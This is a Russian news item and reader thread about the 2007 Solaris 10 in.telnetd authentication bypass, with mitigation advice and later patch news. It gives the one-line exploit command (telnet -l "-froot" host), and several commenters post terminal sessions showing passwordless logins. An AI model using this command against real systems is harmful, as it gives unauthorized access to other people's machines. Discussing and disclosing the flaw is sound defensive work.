В стандартном telnet сервисе (in.telnetd) Solaris 10 обнаружена (http://secunia.com/advisories/24120/) уязвимость позволяющая без лишних усилий получить доступ к системе путем комбинации -l и -f опций.
Например, для входа на удаленную систему без пароля под пользователем root достаточно набрать: telnet -l "-froot" host. Суть в передаче аргумента опции "-l" программе login без проверки, login в свою очередь интерпретирует "-f" - как вход без запроса пароля.
Исправление проблемы еще не анонсировано Sun Microsystems, поэтому крайне рекомендуется отключить in.telnetd сервис или заблокировать пакетным фильтром 23 tcp порт.
Примечательно, что в 1994 году идентичная проблема
была найдена (http://osvdb.org/displayvuln.php?osvdb_id=1007) в сервисе rlogin операционной системы AIX.URL: http://blogs.securiteam.com/index.php/archives/814
Новость: http://www.opennet.me/opennews/art.shtml?num=9842
к вопросу о том кто у кого код слямзил :-)
Давно так не офигевал от Соляры..
Промышленные, блин, системы...(from linux server to solaris 10 x86 U3 + patches)
$ telnet -l"-fjimb" sol10
Trying 10.10.14.3...
Connected to sol10.
Escape character is '^]'.
Last login: Mon Feb 12 12:05:20 from rhel4es-sb
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[jimb@sol10(pts/1) ~]$
что то я не понимаю ... у меня такой номер не прошел
[root@main:/] #telnet -l"froot" 10.0.0.2
Trying 10.0.0.2...
Connected to 10.0.0.2.
Escape character is '^]'.
SunOS 5.10Password:
telnet -l "-froot" 10.0.0.2
Мда.... нехило
[root@main:/] #telnet -l"falk" 10.0.0.2
Trying 10.0.0.2...
Connected to 10.0.0.2.
Escape character is '^]'.SunOS 5.10
Sourcing //.profile-EIS.....
alk@cnr1 # uname -a
SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210
что-то у меня работает только на десятке, и то не под рутом, на девятке - нет.>Мда.... нехило
>[root@main:/] #telnet -l"falk" 10.0.0.2
>Trying 10.0.0.2...
>Connected to 10.0.0.2.
>Escape character is '^]'.
>
>SunOS 5.10
>
>Sourcing //.profile-EIS.....
>alk@cnr1 # uname -a
>SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210
А Соляра другой, простите, ни одного дня не была.Вот уже с 95-го на моей памяти все дыры в ней были строго ГОМЕРИЧЕСКОГО масштаба.
Отродясь это было визиткой Соляры.
Нормальные люди отключают телнет ( по крайней мере для доступа из инета и др. небезопасных сетей )
telnets тоже не использовать?
я уверен что число машин с включённым telnetd мизерно, так что, хоть сам факт такой глупой ошибки и вызывает непонятные чувства, но никак не подрывает авторитет Solaris...
Кстати, в адвойзари ошибка, под рутом в дефолтной инсталляции нельзя зайти. Только под каким-нибудь другим юзером.
Неужели кто то еще пользуется телнетом?
конечно..
например у меня вся безопасность лежит на плечах цысок и внутри сети серверы максимально разгружены и бегают по телнету и rsh к друг другу в гости..
че правда и внутри телнет руту открыт ?
ну вы отважный перец :-)
хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
все по-нормальному вывели ......
> че правда и внутри телнет руту открыт ?
>ну вы отважный перец :-)
>хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
>контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
>все по-нормальному вывели ......
у меня в сети дураков нету.. не та сеть, не те задачи... просто я привёл пример что телнет всё таки нужен
Дураки есть везде, в том числе и на этом сайте в постах
у нормальных админов все эти телнеты и рсаши бегают в отдельном влане.
Ну и ну, телнет действительно не актуален, но проблемма есть. Что касается удалённого входа, то не думаю, что админ оставит открытым телнет для инета, ибо это уже не админ...
Да Солярку в Сеть вообще лучше не выставлять :-)))
да уж
Промышленная система ;)
SunOS 5.10 Generic_118855-14 i86pc i386 i86pc
df -h показывает
/dev/md/dsk/d50 825G 16384E 1.2T 2152924666864% /somemount
df -k показывает
/dev/md/dsk/d50 865477325 18446744073261050460 1305323708 2152924666864% /somemount
эх, бардак...
Ну чего раскудахтались? Ошибки у всех бывают :) Хотя конечно неприято ...
По делу надо добавить:
- подвержены _только_ Solaris 10. Старые соляры все держат пучком :)
- root'ом не зайдешь. Можно только юзером. Утешение слабое, но на безрыбьи ...Самое паскудное - патча нет. Второй день пошел. Для тех кому telnet таки нужен, очень "горячий" второй fu*ng день :-/
а на Sol9 sun не работает это
телнет к сожалению остался на еще момедах, коммутаторах и прочей лабуде. Интересно, неужели sshd на сервере хавает ресурсов больше? Вернее...неверно вопрос задал - в масштабе производительности хорошего сервера (даже на x86) будет заметна разница?
Если железо не на помойке подобрано, то ничего заметно не будет при условии что количество сессий и объем трафика в них не выражаются 4х значными числами.
Многие проги под виндоус исторически заточены работать с сервером без ssh. Конечно, все внутри, но где гарантия , что изнутри нет желающих.Более того, когда у нас админы опечаленные положением дел, без предупреждения закрыли сервисы (telnet и rexec) - народ взвыл! открыли в тот же вечер - переконфигурировать всех клиентов было не реально :))))
Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим telnet, на рутера и сервера - ssh only.
>Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим
>telnet, на рутера и сервера - ssh only.
Напоминает виндузевый подход - если с фаерволом, антивирусом и браузер не IE использовать то даже вроде и не очень дырявая система получается :)
Да лан, что никто не помнит дыру в том же телнете под четвертой фряхой ?
Сколько себя помню, а начинал с FreeBSD 4.x, ни разу не пользовался телнетом... В голову просто не приходило, SSH хватает.
ISR (Interim Security Relief) patches are now available for the Solaris 10
in.telnetd vulnerability from http://sunsolve.sun.com/tpatchesThe Descriptions and readme links are currently empty, but they should be there
shortly.The ISR's are :
IDR125456-01.zip - Solaris 10 SPARC
IDR125457-01.zip - Solaris 10 x86Patch 120068-01 (SPARC) or 120069-01 (x86) are required patches, however none of
these patches/ISR's require a reboot and they will take effect immediately.